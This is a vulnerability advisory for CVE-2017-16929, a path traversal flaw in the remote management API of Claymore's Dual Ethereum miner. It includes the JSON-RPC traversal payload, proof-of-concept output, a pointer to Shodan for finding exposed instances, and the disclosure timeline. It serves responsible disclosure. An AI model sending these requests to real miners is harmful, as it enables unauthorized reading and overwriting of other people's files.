Claymore's Dual Ethereum Miner Path Traversal(CVE-2017-16929)

VuNote =================== Author: <github.com/tintinweb> Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929 Version: 0.2 Date: Nov 30th, 2017 Tag: claymore dual ethereum decred crypto currency miner Overview -------- Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner Vendor: nanopool/claymore References: * https://github.com/nanopool/Claymore-Dual-Miner * https://bitcointalk.org/index.php?topic=1433925.0 Version: 10.1 [2] Latest Version: 10.1 [2] Other Versions: <= 10.1 Platform(s): windows, linux Technology: C/C++ Vuln Classes: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Origin: remote Min. Privs.: authenticated Source: Closed; runtime protection mechanisms CVE: CVE-2017-16929 Description --------- A specialized mining solution with remote management interface for mining ethereum / decred / siacoin / LBRY Credits / pascal coin. quote website [1][2] - Supports new "dual mining" mode: mining both Ethereum and Decred/Siacoin/Lbry/Pascal at the same time, with no impact on Ethereum mining speed. Ethereum-only mining mode is supported as well. - Effective Ethereum mining speed is higher by 3-5% because of a completely different miner code - much less invalid and outdated shares, higher GPU load, optimized OpenCL code, optimized assembler kernels. - Supports both AMD and nVidia cards, even mixed. - No DAG files. - Supports all Stratum versions for Ethereum: can be used directly without any proxies with all pools that support eth-proxy, qtminer or miner-proxy. - Supports Ethereum and Siacoin solo mining. - Supports both HTTP and Stratum for Decred. - Supports both HTTP and Stratum for Siacoin. Note: not all Stratum versions are supported currently for Siacoin. - Supports Stratum for Lbry and Pascal. - Supports failover. - Displays detailed mining information and hashrate for every card. - Supports remote monitoring and management. - Supports GPU selection, built-in GPU overclocking features and temperature management. - Supports Ethereum forks (Expanse, etc). - Windows and Linux versions. Summary ------- > "FOMO driven security blindness." The remote management interface on the Claymore Dual GPU miner 10.1 is vulnerable to an authenticated relative directory traversal vulnerability exploited by issuing a specially crafted remote management request, allowing a remote attacker to read/write arbitrary files due to missing path validation/sanitation. * API calls * miner_getfile (read) ... read any file * miner_file (write) ... write any file conditions: * authenticated * write: *not* in readonly mode Successful exploitation would allow an authenticated user to read/write arbitrary files (process permissions) See attached PoC. Details ------- Service Discovery: * shodan: 'eth result' lists about 170-240 publicly available instances [3] with significant hash power * banner: ```html <html><body bgcolor="#000000" style="font-family: monospace;"> {"result": ["10.1 - ETH", "4286", "149336;7492;0", "30620;29877;28285;30605;29946", "0;0;0", "off;off;off;off;off", "62;65;51;64;61;75;51;67;62;72", "eth-us-east1.nanopool.org:9999", "0;1;0;0"]}<br><br><font color="#ff0000">Remote management: read-only mode, command miner_file ignored </font><br><font color="#00ff00">ETH: 11/22/17-15:28:38 - SHARE FOUND - (GPU 3) .... ``` Remote Management API overview: ```json # >nc -L -p 3333 {"id":0,"jsonrpc":"2.0","method":"miner_getstat1"} {"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]} {"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]} {"id":0,"jsonrpc":"2.0","method":"miner_restart"} {"id":0,"jsonrpc":"2.0","method":"miner_reboot"} {"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]} {"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]} {"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]} {"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]} {"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]} ``` Directory Traversal: * `miner_file` and `miner_getfile` both commands do not seem to attempt to sanitize the provided path in any way allowing for relative path traversal. ```python # Vector: traversal # Description: path traversal # Result: retrieves any file "traversal": {"id":0, "jsonrpc":"2.0", "method":"miner_getfile", "params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}, ##<<-- path travesal ``` //see PoC vector: traversal See attached PoC. Proof of Concept ---------------- Prerequisites: * compatible AMD/NVidia hardware 1. start miner in read/write mode with no passwort being set for testing ``` #> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport 3333 ... ``` 2. run poc.py --vector=traversal <target> (we expect EthDcrMiner64.exe to be placed in a directory called `/Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0`) ```python [poc.py - <module>() ][ INFO] --start-- [poc.py - <module>() ][ INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite [poc.py - <module>() ][ INFO] # github.com/tintinweb [poc.py - iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled. [poc.py - <module>() ][ INFO] [i] Target: 127.0.0.1:3333 [poc.py - <module>() ][ INFO] [+] connected. [poc.py - <module>() ][ DEBUG] <-- 1048 '{"id": 0, "error": null, "result": ["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt", "<encoded file data>"]}' [poc.py - <module>() ][ INFO] --done-- ``` 3. EthDcrMiner returned the files content, as shown in the logs. ```python ... DCR: 11/22/17-22:56:06 - New job from pasc-eu2.nanopool.org:15555 Remote management: file ..\Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0\config.txt was uploaded DCR: 11/22/17-22:56:16 - New job from pasc-eu2.nanopool.org:15555 ... ``` Patch ----- n/A - closed source :/ Notes ----- * Timeline 11/22/2017 - vendor contact: report sent 11/23/2017 - vendor response: fixed version 10.2 ready and publicly available request for 7+ day embargo vendor statement: The root case is that remote management was designed to be used in local network only. But some "smart" people want to share ports to everyone and then catch problems. I will close the issues you found, but attacker will be able to do something bad anyway, at least execute ddos to prevent remote management work as expected. 12/04/2017 - public disclosure * Vendor Changelog Latest version is v10.2: - fixed critical issues in remote management feature (attacker could crash miner even in read-only mode). - now miner supports up to #299 epoch. - in rare cases ADL API calls can hang, now watchdog checks it as well. - improved "-minspeed" option, check readme for details. - added "miner_getstat2" command to remote management, check "API.txt" for details. - EthMan: added detailed stats mode in main window. - a few minor improvements in both miner and EthMan. * Runtime Protection ``` * Linux: packer / just compression * gdb * Windows: protector / anti-debug, vmprotect? * x64dbg: DbgUiRemoteBreakin <- RET ```